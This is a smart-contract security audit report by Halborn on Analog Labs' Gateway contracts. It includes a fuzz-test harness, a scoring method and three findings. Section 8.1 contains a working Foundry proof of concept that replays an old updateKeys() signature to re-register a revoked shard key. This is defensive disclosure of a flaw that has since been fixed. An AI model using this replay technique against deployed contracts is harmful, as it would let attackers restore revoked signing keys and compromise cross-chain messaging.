
Gateway - Analog Labs


Prepared by:


HALBORN

Last Updated 06/27/2024

Date of Engagement: June 12th, 2024 - June 20th, 2024

Summary

100% of all REPORTED Findings have been addressed

All findings: 3

- Critical: 1
- High: 0
- Medium: 1
- Low: 0
- Informational: 1


1. Introduction

Analog Labs engaged Halborn to conduct a security assessment on their smart contracts beginning on June 12th, 2024, and ending on June 20th, 2024. The security assessment was scoped to the smart contracts provided in the analog-gmp GitHub repository (detailed in the Scope section).

2. Assessment Summary

The team at Halborn was provided one and a half weeks for the engagement and assigned a full-time security engineer to verify the security of the smart contracts. The security engineer is a blockchain and smart-contract security expert with advanced penetration testing and smart-contract hacking skills, and deep knowledge of multiple blockchain protocols.

The purpose of this assessment is to:

- Ensure that the smart contract functions operate as intended.

- Identify potential security issues within the smart contracts.

In summary, Halborn identified some security risks that were addressed by the Analog Labs team.

3. Test Approach and Methodology

Halborn performed a combination of manual and automated security testing to balance efficiency, timeliness, practicality, and accuracy in regard to the scope of this assessment. While manual testing is recommended to uncover flaws in logic, process, and implementation, automated testing techniques help enhance coverage of the code and can quickly identify items that do not follow security best practices. The following phases and associated tools were used during the assessment:

- Research into architecture and purpose.

- Smart contract manual code review and walkthrough.

- Graphing out functionality and contract logic/connectivity/functions. (solgraph)

- Manual assessment of use and safety for the critical Solidity variables and functions in scope to identify any arithmetic-related vulnerability classes.

- Manual testing by custom scripts.

- Static analysis of security for scoped contracts and imported functions. (Slither)

- Testnet deployment. (Foundry)

4. Fuzz tests: BranchlessMath library

Fuzz testing is a testing technique that involves sending randomly generated or mutated inputs to a target system to identify unexpected behavior or vulnerabilities. In the context of smart contract assessment, fuzz testing can help identify potential security issues by exposing the smart contracts to a wide range of inputs that they may not have been designed to handle.

In this assessment, we conducted comprehensive fuzzing tests on the BranchlessMath library to assess its resilience to unexpected inputs. Our goal was to identify any potential vulnerabilities or flaws that could be exploited by an attacker, as well as any incorrect or unintended logic. Medusa was the tool chosen to fuzz the BranchlessMath library.

Medusa is a cross-platform, go-ethereum-based smart contract fuzzer inspired by Echidna. It provides parallelized fuzz testing of smart contracts through its CLI or its Go API, which allows custom, user-extended testing methodologies.

The following test contract was built to fuzz-test the BranchlessMath library:

import "forge-std/Test.sol";
import "./BranchlessMath.sol";

// medusa fuzz --target-contracts "BranchlessMathTest" --test-limit 1000000

contract BranchlessMathTest is Test{

    // function min(uint256 x, uint256 y) internal pure returns (uint256 result)
    function testMin(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.min(x, y);
        if(x > y){
            assert(returned == y);
        }
        else{
            assert(returned == x);
        }
    }

    // function max(uint256 x, uint256 y) internal pure returns (uint256 result)
    function testMax(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.max(x, y);
        if(x > y){
            assert(returned == x);
        }
        else{
            assert(returned == y);
        }
    }

    // function select(bool condition, uint256 a, uint256 b) internal pure returns (uint256)
    function testSelectUint(bool cond, uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.select(cond, x, y);
        if(cond){
            assert(returned == x);
        }
        else{
            assert(returned == y);
        }
    }

    // function select(bool condition, address a, address b) internal pure returns (address)
    function testSelectAddr(bool cond, address x, address y) public {
        address returned = BranchlessMath.select(cond, x, y);
        if(cond){
            assert(returned == x);
        }
        else{
            assert(returned == y);
        }
    }

    // function selectIf(bool condition, uint256 value) internal pure returns (uint256)
    function testSelectIf(bool condition, uint256 value) public {
        uint256 returned = BranchlessMath.selectIf(condition, value);
        if(condition){
            assert(returned == value);
        }
        else{
            assert(returned == 0);
        }
    }

    // function saturatingAdd(uint256 x, uint256 y) internal pure returns (uint256 result)
    function testSaturatingAdd(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.saturatingAdd(x, y);
        bool overflow;
        uint256 resultUnchecked;
        unchecked{
            resultUnchecked = x + y;
            // If x + y overflows, the result would be less than either x or y.
            if ((resultUnchecked < x) || (resultUnchecked < y)){
                overflow = true;
            }
        }
        if (overflow){
            assert(returned == type(uint256).max);
        }
        else{
            assert(returned == (x + y));
        }
    }

    // function saturatingSub(uint256 x, uint256 y) internal pure returns (uint256 result)
    function testSaturatingSub(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.saturatingSub(x, y);
        bool underflow;
        if(y > x){
            underflow = true;
        }
        if (underflow){
            assert(returned == 0);
        }
        else{
            assert(returned == (x - y));
        }
    }

    // function saturatingMul(uint256 a, uint256 b) internal pure returns (uint256)
    function testSaturatingMul(uint256 x, uint256 y) public {
        uint256 returned = BranchlessMath.saturatingMul(x, y);
        if(y == 0){
            assert(returned == 0);
            return;
        }
        bool overflow;
        uint256 resultUnchecked;
        unchecked{
            resultUnchecked = x * y;
            // If x * y overflows, dividing the result by y does not give back x.
            if ((resultUnchecked / y) != x){
                overflow = true;
            }
        }
        if (overflow){
            assert(returned == type(uint256).max);
        }
        else{
            assert(returned == (x * y));
        }
    }

    // function saturatingDiv(uint256 x, uint256 y) internal pure returns (uint256 r) 
    function testSaturatingDiv(uint256 x, uint256 y) public {
        if(y == 0){
            y = 1;
        }
        uint256 returned = BranchlessMath.saturatingDiv(x, y);
        assert(returned == (x / y));
    }

    // function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256)
    function testCeilDiv(uint256 x, uint256 y) public {
        // Ensure y is not zero to avoid division by zero
        if (y == 0) {
            y = 1;
        }
        uint256 returned = BranchlessMath.ceilDiv(x, y);
        if((x % y) == 0){
            assert(returned == x / y);
        }
        else{
            assert(returned == (x / y) + 1);
        }
    }

    // function toUint(bool b) internal pure returns (uint256 u)
    function testToUint(bool b) public {
        uint256 u = BranchlessMath.toUint(b);
        if(b){
            assert(u == 1);
        }
        else{
            assert(u == 0);
        }
    }
}

After running the fuzz session with medusa fuzz --target-contracts "BranchlessMathTest" --test-limit 1000000, no issues were found:

Medusa final output

5. RISK METHODOLOGY

Every vulnerability and issue observed by Halborn is ranked based on two sets of Metrics and a Severity Coefficient. This system is inspired by the industry-standard Common Vulnerability Scoring System.
The two Metric sets are Exploitability and Impact. Exploitability captures the ease and technical means by which vulnerabilities can be exploited, and Impact describes the consequences of a successful exploit.
The Severity Coefficient is designed to further refine the accuracy of the ranking with two factors: Reversibility and Scope. These capture the impact of the vulnerability on the environment as well as the number of users and smart contracts affected.
The final score is a value between 0 and 10, rounded up to 1 decimal place, with 10 corresponding to the highest security risk. This provides an objective and accurate rating of the severity of security vulnerabilities in smart contracts.
The system is designed to assist in identifying and prioritizing vulnerabilities based on their level of risk to address the most critical issues in a timely manner.

5.1 EXPLOITABILITY

Attack Origin (AO):
Captures whether the attack requires compromising a specific account.
Attack Cost (AC):
Captures the cost of exploiting the vulnerability incurred by the attacker relative to sending a single transaction on the relevant blockchain. Includes but is not limited to financial and computational cost.
Attack Complexity (AX):
Describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Includes but is not limited to macro situation, available third-party liquidity and regulatory challenges.
Metrics:
Attack Origin (AO): Arbitrary (AO:A) = 1; Specific (AO:S) = 0.2
Attack Cost (AC): Low (AC:L) = 1; Medium (AC:M) = 0.67; High (AC:H) = 0.33
Attack Complexity (AX): Low (AX:L) = 1; Medium (AX:M) = 0.67; High (AX:H) = 0.33
Exploitability E is calculated using the following formula:

E = \prod m_e
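
As an illustration (purely hypothetical metric values, not drawn from any finding in this report), an issue exploitable from an arbitrary account (AO:A = 1), at medium cost (AC:M = 0.67) and low complexity (AX:L = 1) would have:

E = 1 * 0.67 * 1 = 0.67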

5.2 IMPACT

Confidentiality (C):
Measures the impact to the confidentiality of the information resources managed by the contract due to a successfully exploited vulnerability. Confidentiality refers to limiting access to authorized users only.
Integrity (I):
Measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of data stored and/or processed on-chain. Integrity impact directly affecting Deposit or Yield records is excluded.
Availability (A):
Measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. This metric refers to smart contract features and functionality, not state. Availability impact directly affecting Deposit or Yield is excluded.
Deposit (D):
Measures the impact to the deposits made to the contract by either users or owners.
Yield (Y):
Measures the impact to the yield generated by the contract for either users or owners.
Metrics:
Confidentiality (C): None (C:N) = 0; Low (C:L) = 0.25; Medium (C:M) = 0.5; High (C:H) = 0.75; Critical (C:C) = 1
Integrity (I): None (I:N) = 0; Low (I:L) = 0.25; Medium (I:M) = 0.5; High (I:H) = 0.75; Critical (I:C) = 1
Availability (A): None (A:N) = 0; Low (A:L) = 0.25; Medium (A:M) = 0.5; High (A:H) = 0.75; Critical (A:C) = 1
Deposit (D): None (D:N) = 0; Low (D:L) = 0.25; Medium (D:M) = 0.5; High (D:H) = 0.75; Critical (D:C) = 1
Yield (Y): None (Y:N) = 0; Low (Y:L) = 0.25; Medium (Y:M) = 0.5; High (Y:H) = 0.75; Critical (Y:C) = 1
Impact I is calculated using the following formula:

I = max(m_I) + \frac{\sum m_I - max(m_I)}{4}
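
Continuing the hypothetical example above (again, not the score of any finding in this report), an exploit with critical Deposit impact (D:C = 1) and no Confidentiality, Integrity, Availability or Yield impact (all 0) would have:

I = 1 + ((1 + 0 + 0 + 0 + 0) - 1) / 4 = 1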

5.3 SEVERITY COEFFICIENT

Reversibility (R):
Describes the share of the exploited vulnerability effects that can be reversed. For upgradeable contracts, assume the contract private key is available.
Scope (S):
Captures whether a vulnerability in one vulnerable contract impacts resources in other contracts.
Metrics:
Reversibility (r): None (R:N) = 1; Partial (R:P) = 0.5; Full (R:F) = 0.25
Scope (s): Changed (S:C) = 1.25; Unchanged (S:U) = 1
Severity Coefficient C is obtained by the following product:

C = rs

The Vulnerability Severity Score S is obtained by:

S = min(10, E * I * C * 10)

The score is rounded up to 1 decimal place.
Severity / Score Value Range:

- Critical: 9 - 10
- High: 7 - 8.9
- Medium: 4.5 - 6.9
- Low: 2 - 4.4
- Informational: 0 - 1.9
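
To complete the hypothetical example above, if the effects of the exploit are not reversible (R:N = 1) and the scope is unchanged (S:U = 1), then C = 1 * 1 = 1, and the final score is:

S = min(10, 0.67 * 1 * 1 * 10) = 6.7

which falls in the Medium range.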

6. SCOPE

Files and Repository
(a) Repository: analog-gmp
(b) Assessed Commit ID: b4ce053
(c) Items in scope:
  • src/Gateway.sol
  • src/GatewayProxy.sol
  • src/Primitives.sol
Out-of-Scope:
Remediation Commit ID:
Out-of-Scope: New features/implementations after the remediation commit IDs.

7. Assessment Summary & Findings Overview

- Critical: 1
- High: 0
- Medium: 1
- Low: 0
- Informational: 1

Security Analysis | Risk Level | Remediation Date
Gateway.updateKeys() signatures can be replayed | Critical | Solved - 06/25/2024
Call is recommended over transfer to send native assets | Medium | Not Applicable
Use block.chainid to set NETWORK_ID in the Gateway constructor | Informational | Acknowledged

8. Findings & Tech Details

8.1 Gateway.updateKeys() signatures can be replayed

// Critical

Description

In the Gateway contract, the updateKeys() function is used to register shard public keys that can then be used to sign and send GMP messages:

function updateKeys(Signature calldata signature, UpdateKeysMessage memory message) public {
    bytes32 messageHash = message.eip712TypedHash(DOMAIN_SEPARATOR);
    _verifySignature(signature, messageHash);

    // Register shards pubkeys
    _updateKeys(messageHash, message.revoke, message.register);
}
/**
 * Execute GMP message
 * @param signature Schnorr signature
 * @param message GMP message
 */
function execute(Signature calldata signature, GmpMessage calldata message)
    external
    returns (GmpStatus status, bytes32 result)
{
    // Theoretically we could remove the destination network field
    // and fill it up with the network id of the contract, then the signature will fail.
    require(message.destNetwork == NETWORK_ID, "invalid gmp network");
    require(_networks[message.srcNetwork] != bytes32(0), "source network no supported");

    // Verify the signature
    (bytes32 messageHash, bytes memory data) = message.encodeCallback(DOMAIN_SEPARATOR);
    _verifySignature(signature, messageHash); // <-------------------
	...
}
function _verifySignature(Signature calldata signature, bytes32 message) private view {
    // Load shard from storage
    KeyInfo storage signer = _shards[bytes32(signature.xCoord)];

    // Verify if shard is active
    uint8 status = signer.status;
    require((status & SHARD_ACTIVE) > 0, "shard key revoked or not exists"); // <-------------------

    // Load y parity bit, it must be 27 (even), or 28 (odd)
    // ref: https://ethereum.github.io/yellowpaper/paper.pdf
    uint8 yParity = uint8(BranchlessMath.select((status & SHARD_Y_PARITY) > 0, 28, 27));

    // Verify Signature
    require(
        Schnorr.verify(yParity, signature.xCoord, uint256(message), signature.e, signature.s),
        "invalid tss signature"
    );
}

However, under the current implementation, the signature passed as a parameter to the updateKeys() function can be replayed:

  1. A shard key (the key derived from seed 1338 in the PoC below) is registered with signature1.

  2. The same key is revoked with signature2.

  3. Any user can reuse signature1 to re-register the revoked key as a valid key.

Proof of Concept

Foundry POC:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
/** 
Run this test with:
forge test -vvvvv --match-contract Deploy --match-test test_setUp
forge test -vvvv --match-contract Deploy --match-test test_1
    - Signatures can be reused in updateKeys() function
*/
import "forge-std/Test.sol";
import "../src/Gateway.sol";
import "../src/Primitives.sol";
import "../src/GatewayProxy.sol";
import "../lib/frost-evm/sol/Schnorr.sol";
import "../lib/frost-evm/sol/Signer.sol";
contract Deploy is Test {
    using PrimitiveUtils for GmpMessage;
    using PrimitiveUtils for UpdateKeysMessage;
    Gateway public contract_Gateway;
    Gateway public contract_GatewayImplementation;
    address public owner = vm.addr(100);
    address public user1 = vm.addr(101);
    address public user2 = vm.addr(102);
    address public user3 = vm.addr(103);
    address public user4 = vm.addr(104);
    address public user5 = vm.addr(105);
    address public user6 = vm.addr(106);
    address public user7 = vm.addr(107);
    address public user8 = vm.addr(108);
    address public user9 = vm.addr(109);
    address public user10 = vm.addr(110);
    Signature signatureStored;
    function setUp() public {
        _deployAll();
    }
    function test_setUp() public view {
        console.log("test_setUp()");
        console.log("____________________________________");
        console.log("contract_GatewayImplementation -> %s", address(contract_GatewayImplementation));
        console.log("contract_Gateway -> %s", address(contract_Gateway));
    }
    function _deployAll() internal {
        console.log("_deployAll()");
        vm.startPrank(owner, owner);
        // 1 - Deploy the implementation contract
        address proxyAddr = vm.computeCreateAddress(owner, vm.getNonce(owner) + 2);
        contract_GatewayImplementation = new Gateway(2, proxyAddr);
        // 2 - Deploy the Proxy Contract
        Signer signer = new Signer(1337);
        TssKey[] memory keys = new TssKey[](1);
        keys[0] = TssKey({yParity: signer.yParity() == 28 ? 1 : 0, xCoord: signer.xCoord()});
        Network[] memory networks = new Network[](2);
        networks[0].id = 1; // sepolia network id
        networks[0].gateway = proxyAddr; // sepolia proxy address
        networks[1].id = 2; // shibuya network id
        networks[1].gateway = proxyAddr; // shibuya proxy address
        bytes memory initializer = abi.encodeCall(Gateway.initialize, (msg.sender, keys, networks));
        contract_Gateway = Gateway(address(new GatewayProxy(address(contract_GatewayImplementation), initializer)));
        vm.stopPrank();
    }
    function test_1() public {
        console.log(StdStyle.yellow("\n\ntest_1()"));
        console.log(StdStyle.yellow("__________________________\n"));
        /*
            function updateKeys(Signature memory signature, UpdateKeysMessage memory message)
            struct Signature {
                uint256 xCoord; // public key x coordinates, y-parity is stored in the contract
                uint256 e; // Schnorr signature e parameter
                uint256 s; // Schnorr signature s parameter
            }
            struct UpdateKeysMessage {
                TssKey[] revoke; // Keys to revoke
                TssKey[] register; // Keys to add
            }
        */
        {
            TssKey[] memory revoke = new TssKey[](0);
            TssKey[] memory register = new TssKey[](1);
            Signer signerCurrent = new Signer(1337);
            Signer signerToAdd = new Signer(1338);
            register[0].yParity = signerToAdd.yParity() == 28 ? 1 : 0;
            register[0].xCoord = signerToAdd.xCoord();
            UpdateKeysMessage memory message;
            message.revoke = revoke;
            message.register = register;
            vm.startPrank(owner, owner);
            Signature memory signature;
            uint256 hash = uint256(message.eip712TypedHash(contract_Gateway.DOMAIN_SEPARATOR()));
            // uint256 hash = uint256(keccak256(contract_Gateway.getUpdateKeysTypedHash(message)));
            (uint256 e, uint256 s) = signerCurrent.signPrehashed(hash, 1); // nonce = 1;
            signature.xCoord = signerCurrent.xCoord();
            signature.e = e;
            signature.s = s;
            // Add 1338
            console.log(StdStyle.yellow("\nOWNER(%s) calls < contract_Gateway.updateKeys(signature, message) >"), owner);
            contract_Gateway.updateKeys(signature, message);
            signatureStored = signature;
        }
        {
            TssKey[] memory revoke = new TssKey[](1);
            TssKey[] memory register = new TssKey[](0);
            Signer signerCurrent = new Signer(1337);
            Signer signerToRevoke = new Signer(1338);
            revoke[0].yParity = signerToRevoke.yParity() == 28 ? 1 : 0;
            revoke[0].xCoord = signerToRevoke.xCoord();
            UpdateKeysMessage memory message;
            message.revoke = revoke;
            message.register = register;
            vm.startPrank(owner, owner);
            Signature memory signature;
            uint256 hash = uint256(message.eip712TypedHash(contract_Gateway.DOMAIN_SEPARATOR()));
            (uint256 e, uint256 s) = signerCurrent.signPrehashed(hash, 1); // nonce = 1;
            signature.xCoord = signerCurrent.xCoord();
            signature.e = e;
            signature.s = s;
            // Revoke 1338
            console.log(StdStyle.yellow("\nOWNER(%s) calls < contract_Gateway.updateKeys(signature, message) >"), owner);
            contract_Gateway.updateKeys(signature, message);
        }
        vm.stopPrank();
        vm.startPrank(user1, user1);
        {
            // Reuse signature
            TssKey[] memory revoke = new TssKey[](0);
            TssKey[] memory register = new TssKey[](1);
            Signer signerToAdd = new Signer(1338);
            register[0].yParity = signerToAdd.yParity() == 28 ? 1 : 0;
            register[0].xCoord = signerToAdd.xCoord();
            UpdateKeysMessage memory message;
            message.revoke = revoke;
            message.register = register;
            console.log(StdStyle.yellow("\nUSER1(%s) calls < contract_Gateway.updateKeys(signature, message) >"), user1);
            contract_Gateway.updateKeys(signatureStored, message);
        }
        vm.stopPrank();
    }
}
BVSS
Recommendation

Consider hashing the signature struct, marking that hash as used once consumed, and adding a require check to the updateKeys() function that rejects already-used signatures.
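
A minimal sketch of this approach is shown below (illustrative only; the _usedSignatures mapping name and the revert string are placeholders and do not reflect the remediation commit):

// Illustrative sketch: track consumed signatures to reject replays.
mapping(bytes32 => bool) private _usedSignatures; // hypothetical storage mapping

function updateKeys(Signature calldata signature, UpdateKeysMessage memory message) public {
    bytes32 messageHash = message.eip712TypedHash(DOMAIN_SEPARATOR);

    // Bind the signature parameters to the signed message and reject replays.
    bytes32 sigHash = keccak256(abi.encode(signature.xCoord, signature.e, signature.s, messageHash));
    require(!_usedSignatures[sigHash], "signature already used");
    _usedSignatures[sigHash] = true;

    _verifySignature(signature, messageHash);

    // Register shards pubkeys
    _updateKeys(messageHash, message.revoke, message.register);
}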

Remediation Plan

SOLVED: The Analog Labs team solved the issue by implementing the recommended solution.

Remediation Hash

8.2 Call is recommended over transfer to send native assets

// Medium

Description

The Gateway contract performs gas refunds to depositors by making use of the Solidity transfer() function:

// Calculate a gas refund, capped to protect against huge spikes in `tx.gasprice`
// that could drain funds unnecessarily. During these spikes, relayers should back off.
unchecked {
    uint256 refund = BranchlessMath.min(gasUsed * tx.gasprice, deposited);
    _deposits[message.source][message.srcNetwork] -= refund;
    payable(msg.sender).transfer(refund); // <-----------------------------------
}

In Solidity, the call() function is often preferred over transfer() for sending Ether due to gas limit considerations:

  • transfer: Imposes a fixed gas limit of 2300 gas. This limit can be too restrictive, especially if the receiving contract is a multisig wallet that executes more complex logic in its receive() function. For example, native transfer() calls to Gnosis Safe multisigs will always revert with an out-of-gas error on Binance Smart Chain.

  • call: Allows specifying a custom gas limit, providing more flexibility and ensuring that the receiving contract can perform necessary operations.

It should be noted that using call also requires explicit reentrancy protection mechanisms (e.g., using the checks-effects-interactions pattern or the ReentrancyGuard contract from OpenZeppelin).

BVSS
Recommendation

Consider using call() over transfer() to transfer native assets in order to ensure compatibility with any type of multisig wallet. As for the reentrancy risks, these are currently mitigated by the following code in the Gateway.execute() function:

// Execute GMP message
function _execute(bytes32 payloadHash, GmpMessage calldata message, bytes memory data)
    private
    returns (GmpStatus status, bytes32 result)
{
    // Verify if this GMP message was already executed
    GmpInfo storage gmp = _messages[payloadHash];
    require(gmp.status == GmpStatus.NOT_FOUND, "message already executed");

    // Update status to `pending` to prevent reentrancy attacks.
    gmp.status = GmpStatus.PENDING;
    gmp.blockNumber = uint64(block.number);
	...
}
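
For reference, a hedged sketch of the refund performed with call instead of transfer (variable names follow the refund snippet above; the forwarded gas and the revert string are illustrative choices, not the project's code):

uint256 refund;
unchecked {
    refund = BranchlessMath.min(gasUsed * tx.gasprice, deposited);
    _deposits[message.source][message.srcNetwork] -= refund;
}

// Forward all available gas and check the result explicitly.
(bool success, ) = payable(msg.sender).call{value: refund}("");
require(success, "refund transfer failed");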

Remediation Plan

NOT APPLICABLE: The Analog Labs team states that only their own chronicles will call this function and receive funds from it, and hence it will not be used by an external smart contract.

8.3 Use block.chainid to set NETWORK_ID in the Gateway constructor

// Informational

Description

In the GatewayEIP712 contract, the networkId is passed as a parameter to the contract constructor:

constructor(uint16 networkId, address gateway) {
    NETWORK_ID = networkId;
    PROXY_ADDRESS = gateway;
    DOMAIN_SEPARATOR = computeDomainSeparator(networkId, gateway);
}

This can be prone to human error; instead, block.chainid can be used.

Score
Recommendation

Consider using block.chainid in the GatewayEIP712 contract constructor:

constructor(address gateway) {
    NETWORK_ID = uint16(block.chainid); // <-------------------------
    PROXY_ADDRESS = gateway;
    DOMAIN_SEPARATOR = computeDomainSeparator(NETWORK_ID, gateway);
}

Remediation Plan

ACKNOWLEDGED: The Analog Labs team acknowledged this finding.

9. Automated Testing

Halborn used automated testing techniques to enhance the coverage of certain areas of the smart contracts in scope. Among the tools used was Slither, a Solidity static analysis framework. After Halborn verified the smart contracts in the repository and was able to compile them correctly into their ABIs and binary format, Slither was run against the contracts. This tool can statically verify mathematical relationships between Solidity variables to detect invalid or inconsistent usage of the contracts' APIs across the entire codebase.

Gateway.sol

Slither output: Gateway #1, Gateway #2

GatewayProxy.sol

Slither output: GatewayProxy #1
  • Ether is not sent to an arbitrary destination. It is sent to the execute() caller, which should always be a privileged account.

  • The controlled delegate call flagged by Slither is used to perform a contract upgrade.

  • No major issues were found by Slither.

Halborn strongly recommends conducting a follow-up assessment of the project either within six months or immediately following any material changes to the codebase, whichever comes first. This approach is crucial for maintaining the project’s integrity and addressing potential vulnerabilities introduced by code modifications.

© Halborn 2024. All rights reserved.